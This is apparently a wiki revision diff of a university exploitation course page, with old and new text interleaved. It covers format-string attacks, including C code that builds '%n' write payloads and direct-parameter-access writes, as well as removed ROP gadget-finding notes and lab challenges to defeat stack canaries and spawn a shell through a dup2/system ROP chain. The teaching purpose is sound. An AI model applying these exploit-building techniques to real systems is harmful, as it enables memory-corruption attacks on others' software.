 -Then you can break on all called functions or step as needed to see if the payload is doing what you want it to. +The write code has to be adjusted to the number of bytes written by the stackpop: the stackpop has already written characters to the output by the time the format function parses the write-code, so the format function counter does not start at zero, and this has to be taken into account.
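
As an illustration of the write-code part only, the following sketch generates the four '%<width>u%n' pairs for a given target value. The names ''pad_to_byte'' and ''build_write_code'' are hypothetical; the ''written'' argument models the characters already produced by the stackpop and the dummy-addr-pair section, which the caller has to measure for the actual target.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Same padding rule as in the text: never return a width below 10. */
static unsigned int pad_to_byte(unsigned int byte, unsigned int written)
{
    unsigned int padding = (byte + 0x100 - written % 0x100) % 0x100;
    return padding < 10 ? padding + 0x100 : padding;
}

/*
 * Builds "%<w0>u%n%<w1>u%n%<w2>u%n%<w3>u%n" into out so that the
 * four '%n' stores leave target[0..3] in memory (lowest address
 * first). written is the output counter before the write-code runs.
 * Returns the length of the generated string, or -1 if out is too small.
 */
int build_write_code(char *out, size_t out_size,
                     const unsigned char target[4], unsigned int written)
{
    size_t used = 0;

    assert(out != NULL && target != NULL && out_size > 0);
    out[0] = '\0';
    for (int i = 0; i < 4; i++) {
        unsigned int padding = pad_to_byte(target[i], written);
        int n = snprintf(out + used, out_size - used, "%%%uu%%n", padding);

        if (n < 0 || (size_t)n >= out_size - used)
            return -1;
        used += (size_t)n;
        written += padding;
    }
    return (int)used;
}
```

For the target bytes 80 40 20 10 and a counter starting at zero, the generated string should be "%128u%n%192u%n%224u%n%240u%n". In a real format string the counter does not start at zero, so the measured value has to be passed as ''written''.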
- +==== Direct Parameter Access ==== 
 - +There is a huge simplification known as 'direct parameter access', a way to directly address a stack parameter from within the format string. Almost all C libraries currently in use support this feature, but not all of them allow this 
 -==== checksec in peda +method to be applied to format string exploitation. 
 -<code bash> +Direct parameter access is controlled by the '$' qualifier: 
 -gdb-peda$ checksec +<code C> 
-CANARY    disabled +printf ("%6$d\n", 6, 5, 4, 3, 2, 1);
-FORTIFY   : disabled +
-NX        : ENABLED +
-PIE       : disabled +
-RELRO     : Partial+
 </code> </code>
  
 +Prints '1', because the '6$' explicitly addresses the 6th parameter on the stack. Using this method the whole stack pop sequence can be left out.
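
A benign way to see the '$' qualifier at work is to reorder two arguments. The sketch below assumes a C library with POSIX numbered-argument support (for example glibc); the qualifier is not part of ISO C, and the helper name ''format_swapped'' is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Formats the two strings in reverse order using numbered arguments:
 * "%2$s" selects the second argument after the format string and
 * "%1$s" the first. Returns what snprintf returns.
 */
int format_swapped(char *out, size_t out_size,
                   const char *first, const char *second)
{
    assert(out != NULL && first != NULL && second != NULL);
    return snprintf(out, out_size, "%2$s %1$s", first, second);
}
```

Calling it with "world" and "hello" should produce "hello world", which shows that the position in the format string no longer dictates which argument is consumed.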
  
 -==== gadget finding in peda +<code C> 
 -Apart from **objdump** which only finds aligned instructions, you can also use **dumprop** in peda to find all gadgets in a memory region or mapping: +char foo[4]; 
 -<code bash> +printf ("%1$16u%2$n" 
 -gdb-peda$ start +        "%1$16u%3$n" 
 -.... +        "%1$32u%4$n" 
 -gdb-peda$ dumprop +        "%1$64u%5$n", 
 -Warning: this can be very slow, do not run for large memory range +        1, 
 -Writing ROP gadgets to file: a-rop.txt ... +        (int *) &foo[0], (int *) &foo[1], 
 -0x8048467: ret +        (int *) &foo[2], (int *) &foo[3]);
-0x804835d: iret +
-0x804838f: repz ret +
-0x80483be: ret 0xeac1 +
-0x80483a9: leave; ret +
-0x80485b4: inc ecx; ret +
-0x80484cf: pop ebp; ret +
-0x80482f5: pop ebx; ret +
-0x80484df: nop; repz ret +
-0x80483a8: ror cl,1; ret +
-0x804838e: add dh,bl; ret +
-0x80483e5: ror cl,cl; ret +
-0x8048465: add cl,cl; ret +
-0x804840b: leave; repz ret +
-0x8048371: sbb al,0x24; ret +
-0x80485b3: adc al,0x41; ret +
-0x8048370: mov ebx,[esp]; ret +
-0x80484de: nop; nop; repz ret +
-0x80483a7: call eax; leave; ret +
-0x80483e4: call edx; leave; ret +
-0x804840a: add ecx,ecx; repz ret +
-0x80484ce: pop edi; pop ebp; ret+
 </code> </code>
  
-Something finer is: 
-<code bash> 
-gdb-peda$ asmsearch "pop ? ; ret" 
-0x080482f5 : (5bc3) pop    ebx; ret 
-0x080484cf : (5dc3) pop    ebp; ret 
-0x080484f6 : (5bc3) pop    ebx; ret 
  
-gdb-peda$ asmsearch "pop ? ; pop ? ; ret"
-0x080484ce : (5f5dc3) pop    edi; pop    ebp; ret
 +==== Generalizing format string exploits ====
 +The ''printf'' example is just one of many cases of format string vulnerabilities.
 +In general, any system that interprets user input as control data, letting it steer program execution or data access, can be susceptible to the same kind of vulnerability. Other well-known examples are:
 +  * SQL injections
 +  * XSS injections
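What these cases share is that untrusted input ends up being interpreted rather than merely displayed or stored. For the ''printf'' case, a minimal sketch of the usual remedy is to keep the format string constant and pass the input as an argument. The helper name ''echo_as_data'' is hypothetical and only illustrates the idea.

```c
#include <stdio.h>

/* Hypothetical helper: copies untrusted text into `out` as plain data.
 * The format string is the constant "%s", so any conversion specifiers
 * inside `user` are never interpreted.
 *
 * The vulnerable variant would be: snprintf(out, n, user);
 */
int echo_as_data(char *out, size_t n, const char *user)
{
    return snprintf(out, n, "%s", user);
}
```

With this helper, an input such as ''%x %6$d %n'' comes out unchanged instead of leaking stack contents or triggering a write.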
 +===== Tasks =====
  
-gdb-peda$ asmsearch "call ?"
-0x080483a7 : (ffd0) call   eax
-0x080483e4 : (ffd2) call   edx
-0x0804842f : (ffd0) call   eax
-
-</code>
 +==== Stack Canaries ====

 +Download the archive with the tasks at the top of the page. The binaries should be fairly easy to reverse engineer. You can use any tool.
  
-==== Anti-anti-debugging and others
-There can be various annoyances in binaries: **ptrace** calls for anti-debugging, **sleep** calls to prevent bruteforcing or **fork** calls to use child processes to serve requests.
-These can all be deactivated using **unptrace** (for ptrace) and **deactive** in peda.
 +=== Task 1 ===
  
 +The ''mycanary'' binary contains a custom stack canary implementation. Can you defeat it? Call ''bad_func()''.
  
 +=== Task 2 ===
  
-== Challenges
-
-=== 1. Challenge - Gadget tutorial
-
-This task requires you to construct a payload using gadgets and calling the functions inside such that it will print
-<code>
-Hello!
-stage A!stage B!
-</code>
-Make it also print the messages in reverse order:
-<code>
-Hello!
-stage B!stage A!
-</code>
 +The ''bulletproof'' binary is compiled using GCC's SSP. I bet you can defeat it, **twice**! Don't let me down. Call ''bad_func()'' in **2 ways**: by overwriting a function pointer, and by overwriting a stack return address. **Disable ASLR for the second attack.**

 +<note warning>
 +You need to use the 32 bit VM to solve the second part of this task.
 +</note>

 +<note warning>
 +''bad_func'' does not exit the program. You should use ''cat <payload_file> - | ./bulletproof'' so that you can detect if ''bad_func'' was called in the program loop.
 +</note>
  
 +<note tip>In case you need some help with these, take a look at the {{:session:canaries_source.zip|source code}}.</note>
  
-=== 2. Challenge - Echo service 
-This task is a network service that can be exploited. Run it locally and try to exploit it. You'll find that if you call system("/bin/sh") the shell is opened in the terminal where the server was started instead of the one where the attack takes place. This happens because the client-server communication takes place over a socket. When you spawn a shell it will inherit the Standard I/O descriptors from the parent and use those. To fix this you need to redirect the socket fd into 0,1 (and optionally 2). 
- 
-So you will need to do the equivalent of the following in a ROP chain: 
-<code c> 
- dup2(sockfd, 1); 
- dup2(sockfd, 0); 
- system("/bin/sh"); 
-</code> 
  
 +==== Task 3 - Format Strings ====
 +Download the archive with the tasks from the top of the page. It contains 5 binaries that exhibit a format string vulnerability. Analyze what each binary does using the methods already familiar to you and try to determine the exact format string that will lead to the desired result.
 +<note important>
 +The difficulty of the task associated with each binary increases with the number of the binary. 
 +</note>
 +<note tip>(gdb) p $_siginfo._sifields._sigfault.si_addr
 +shows you the invalid address associated with a SIGSEGV signal. 
 +</note>
  
-Exploit it first with ASLR disabled and then enabled. 
session/11.1594189135.txt.gz · Last modified: 2020/07/08 09:18 by Liza-Elena BABU (78556)